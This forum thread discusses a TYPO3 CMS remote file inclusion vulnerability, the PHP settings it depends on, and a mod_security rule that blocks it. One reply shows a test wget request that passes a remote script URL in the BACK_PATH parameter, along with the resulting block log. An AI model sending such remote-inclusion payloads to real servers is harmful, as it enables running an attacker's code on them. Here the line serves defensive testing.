The TYPO3 developer team has warned that a critical hole in the TYPO3 Content Management System (CMS) potentially allows attackers to compromise a server. Insufficient checking of the AbstractController.php file's BACK_PATH parameter enables attackers to upload and execute arbitrary PHP scripts (Remote File Inclusion). The developers have been informed that attackers are already trying to intrude into users' servers on a large scale.

TYPO3 versions 4.5.0 to 4.5.8 as well as 4.6.0 and 4.6.1 are vulnerable – but only if the register_globals, allow_url_include and allow_url_fopen PHP variables are set. Only the last of these is enabled by default. Administrators should ensure that at least one of the three options is disabled. The developer team has provided a patch and released the corrected versions 4.5.9 and 4.6.2. Alternatively, users can implement a mod_security rule as described in the developers' advisory.

SOURCE:
http://www.h-online.com/open/news/item/ ... 97861.html

Well, allow_url_include is a new one on me. It isn't in my php.ini. Maybe something in a newer version of php (5.2+?)

But remote url inclusion would be prevented at at least two levels generally:
Suhosin would prevent it by default if you have it installed.
Various ASL mod_sec rules prevent remote url inclusions
And if there isn't already, there will be a specific ASL mod_sec rule to catch this specific Typo3 issue shortly.

As an aside, on the two Typo3 installs we had (both now gone), both customers wanted us to enable allow_url_fopen (which is normally disabled on our systems and which ASL flags as a vulnerability otherwise)

Register_globals is a pain in the bum and always has been. It is one of the most dangerous php features. Unfortunately it is needed by a number of older scripts. These are, thankfully, almost extict now.

Yes, ASL already protects you from this entire class of vulnerabilities:

[root@asl-modsec-test ~]# wget localhost/whatever.php?BACK_PATH=http://www.example.com/badscript.php
--2011-12-24 09:28:54-- http://localhost/whatever.php?BACK_PATH ... script.php
Resolving localhost... 127.0.0.1
Connecting to localhost|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
2011-12-24 09:28:54 ERROR 403: Forbidden.

[modsecurity] [client 127.0.0.1] [domain localhost] [403] [/20111224/20111224-0927/20111224-092714-VHgvyMCoAfkAAHWhc@gAAAAD] [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "486"] [id "340162"] [rev "257"] [msg "Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)"] [data "http:/"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Match of "beginsWith http:/%{SERVER_NAME}/" against "MATCHED_VAR" required.

So it doesnt matter if you have any of these functions enabled or not, the attack is blocked regardless.

The allow_url_include setting was introduced in PHP 5.2.0 according to http://php.net/manual/en/filesystem.configuration.php

Thanks Breun!

Vrolijk Kerstfeest en een Gelukkig Nieuwjaar!
(Or: "Nadolig Llawen a Blwyddyn Newydd Dda" in one of my languages)

Thanks everybody.
Great that ASL covers this already. Like always

I wish a merry christmas to the Atomicorp team and all members.